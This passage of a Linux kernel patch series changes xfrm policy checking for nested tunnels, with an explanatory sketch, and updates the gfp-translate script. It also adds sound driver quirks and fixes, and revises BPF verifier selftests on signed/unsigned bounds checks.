+@@ -3274,6 +3274,13 @@ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int star
+ 		if (xfrm_state_ok(tmpl, sp->xvec[idx], family, if_id))
+ 			return ++idx;
+ 		if (sp->xvec[idx]->props.mode != XFRM_MODE_TRANSPORT) {
++			if (idx < sp->verified_cnt) {
++				/* Secpath entry previously verified, consider optional and
++				 * continue searching
++				 */
++				continue;
++			}
++
+ 			if (start == -1)
+ 				start = -2-idx;
+ 			break;
+@@ -3648,6 +3655,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		 * Order is _important_. Later we will implement
+ 		 * some barriers, but at the moment barriers
+ 		 * are implied between each two transformations.
++		 * Upon success, marks secpath entries as having been
++		 * verified to allow them to be skipped in future policy
++		 * checks (e.g. nested tunnels).
+ 		 */
+ 		for (i = xfrm_nr-1, k = 0; i >= 0; i--) {
+ 			k = xfrm_policy_ok(tpp[i], sp, k, family, if_id);
+@@ -3666,6 +3676,8 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		}
+ 
+ 		xfrm_pols_put(pols, npols);
++		sp->verified_cnt = k;
++
+ 		return 1;
+ 	}
+ 	XFRM_INC_STATS(net, LINUX_MIB_XFRMINPOLBLOCK);
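
The xfrm_policy.c hunk is the companion change: on a successful inbound
policy check, __xfrm_policy_check() records in sp->verified_cnt how far down
the secpath the template loop got, and xfrm_policy_ok() treats an
already-verified tunnel-mode entry as optional instead of ending the template
search, so with nested tunnels the inner policy check can step past the
outer, previously verified states. A condensed sketch of the modified loop in
xfrm_policy_ok(), with variable roles as in the hunk above:

	/* The template-matching loop in xfrm_policy_ok(), as modified above.
	 * idx walks the secpath; start tracks where the search began.
	 */
	for (; idx < sp->len; idx++) {
		if (xfrm_state_ok(tmpl, sp->xvec[idx], family, if_id))
			return ++idx;
		if (sp->xvec[idx]->props.mode != XFRM_MODE_TRANSPORT) {
			/* Entries below verified_cnt already passed an earlier
			 * policy check (the outer tunnel), so keep searching
			 * instead of failing the template match.
			 */
			if (idx < sp->verified_cnt)
				continue;
			if (start == -1)
				start = -2 - idx;
			break;
		}
	}
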
+diff --git a/scripts/gfp-translate b/scripts/gfp-translate
+index b2ce416d944b3..6c9aed17cf563 100755
+--- a/scripts/gfp-translate
++++ b/scripts/gfp-translate
+@@ -63,11 +63,11 @@ fi
+ 
+ # Extract GFP flags from the kernel source
+ TMPFILE=`mktemp -t gfptranslate-XXXXXX` || exit 1
+-grep -q ___GFP $SOURCE/include/linux/gfp.h
++grep -q ___GFP $SOURCE/include/linux/gfp_types.h
+ if [ $? -eq 0 ]; then
+-	grep "^#define ___GFP" $SOURCE/include/linux/gfp.h | sed -e 's/u$//' | grep -v GFP_BITS > $TMPFILE
++	grep "^#define ___GFP" $SOURCE/include/linux/gfp_types.h | sed -e 's/u$//' | grep -v GFP_BITS > $TMPFILE
+ else
+-	grep "^#define __GFP" $SOURCE/include/linux/gfp.h | sed -e 's/(__force gfp_t)//' | sed -e 's/u)/)/' | grep -v GFP_BITS | sed -e 's/)\//) \//' > $TMPFILE
++	grep "^#define __GFP" $SOURCE/include/linux/gfp_types.h | sed -e 's/(__force gfp_t)//' | sed -e 's/u)/)/' | grep -v GFP_BITS | sed -e 's/)\//) \//' > $TMPFILE
+ fi
+ 
+ # Parse the flags
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 920e44ba998a5..eb049014f87ac 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9594,6 +9594,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
++	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC225_FIXUP_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -9814,6 +9815,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
++	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC225_FIXUP_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 84b401b685f7f..c1ca3ceac5f2f 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -171,6 +171,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21CL"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21EF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/nau8824.c b/sound/soc/codecs/nau8824.c
+index 4f19fd9b65d11..5a4db8944d06a 100644
+--- a/sound/soc/codecs/nau8824.c
++++ b/sound/soc/codecs/nau8824.c
+@@ -1903,6 +1903,30 @@ static const struct dmi_system_id nau8824_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)(NAU8824_MONO_SPEAKER),
+ 	},
++	{
++		/* Positivo CW14Q01P */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "CW14Q01P"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
++	{
++		/* Positivo K1424G */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "K1424G"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
++	{
++		/* Positivo N14ZP74G */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "N14ZP74G"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 402286dfaea44..9c10200ff34b2 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1190,7 +1190,6 @@ static const struct regmap_config wcd938x_regmap_config = {
+ 	.readable_reg = wcd938x_readable_register,
+ 	.writeable_reg = wcd938x_writeable_register,
+ 	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+ };
+ 
+ static const struct sdw_slave_ops wcd9380_slave_ops = {
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 6d88af5b287fe..b33104715c7ba 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -491,14 +491,21 @@ static int fsl_sai_set_bclk(struct snd_soc_dai *dai, bool tx, u32 freq)
+ 	regmap_update_bits(sai->regmap, reg, FSL_SAI_CR2_MSEL_MASK,
+ 			   FSL_SAI_CR2_MSEL(sai->mclk_id[tx]));
+ 
+-	if (savediv == 1)
++	if (savediv == 1) {
+ 		regmap_update_bits(sai->regmap, reg,
+ 				   FSL_SAI_CR2_DIV_MASK | FSL_SAI_CR2_BYP,
+ 				   FSL_SAI_CR2_BYP);
+-	else
++		if (fsl_sai_dir_is_synced(sai, adir))
++			regmap_update_bits(sai->regmap, FSL_SAI_xCR2(tx, ofs),
++					   FSL_SAI_CR2_BCI, FSL_SAI_CR2_BCI);
++		else
++			regmap_update_bits(sai->regmap, FSL_SAI_xCR2(tx, ofs),
++					   FSL_SAI_CR2_BCI, 0);
++	} else {
+ 		regmap_update_bits(sai->regmap, reg,
+ 				   FSL_SAI_CR2_DIV_MASK | FSL_SAI_CR2_BYP,
+ 				   savediv / 2 - 1);
++	}
+ 
+ 	if (sai->soc_data->max_register >= FSL_SAI_MCTL) {
+ 		/* SAI is in master mode at this point, so enable MCLK */
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index 697f6690068c8..c5423f81e4560 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -116,6 +116,7 @@
+ 
+ /* SAI Transmit and Receive Configuration 2 Register */
+ #define FSL_SAI_CR2_SYNC	BIT(30)
++#define FSL_SAI_CR2_BCI		BIT(28)
+ #define FSL_SAI_CR2_MSEL_MASK	(0x3 << 26)
+ #define FSL_SAI_CR2_MSEL_BUS	0
+ #define FSL_SAI_CR2_MSEL_MCLK1	BIT(26)
+diff --git a/sound/soc/generic/simple-card.c b/sound/soc/generic/simple-card.c
+index feb55b66239b8..fbb682747f598 100644
+--- a/sound/soc/generic/simple-card.c
++++ b/sound/soc/generic/simple-card.c
+@@ -416,6 +416,7 @@ static int __simple_for_each_link(struct asoc_simple_priv *priv,
+ 
+ 			if (ret < 0) {
+ 				of_node_put(codec);
++				of_node_put(plat);
+ 				of_node_put(np);
+ 				goto error;
+ 			}
+diff --git a/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c b/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
+index c2aa6f26738b4..bf82b923c5fe5 100644
+--- a/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
++++ b/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
+@@ -1,13 +1,14 @@
+ {
+ 	"bounds checks mixing signed and unsigned, positive bounds",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 2),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 3),
+@@ -17,20 +18,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 3),
+@@ -40,20 +42,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 2",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 5),
+@@ -65,20 +68,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 3",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 4),
+@@ -89,20 +93,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 4",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 1),
+ 	BPF_ALU64_REG(BPF_AND, BPF_REG_1, BPF_REG_2),
+@@ -112,19 +117,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 5",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 5),
+@@ -135,17 +141,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 6",
+ 	.insns = {
++	BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
++	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
+ 	BPF_MOV64_IMM(BPF_REG_2, 0),
+ 	BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -512),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_6, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_4, BPF_REG_6, 5),
+@@ -163,13 +172,14 @@
+ {
+ 	"bounds checks mixing signed and unsigned, variant 7",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 1024 * 1024 * 1024),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 3),
+@@ -179,19 +189,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 8",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -203,20 +214,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 9",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 10),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_LD_IMM64(BPF_REG_2, -9223372036854775808ULL),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -228,19 +240,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 10",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 0),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -252,20 +265,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 11",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -278,20 +292,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 12",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -6),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -303,20 +318,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 13",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 2),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -331,7 +347,7 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
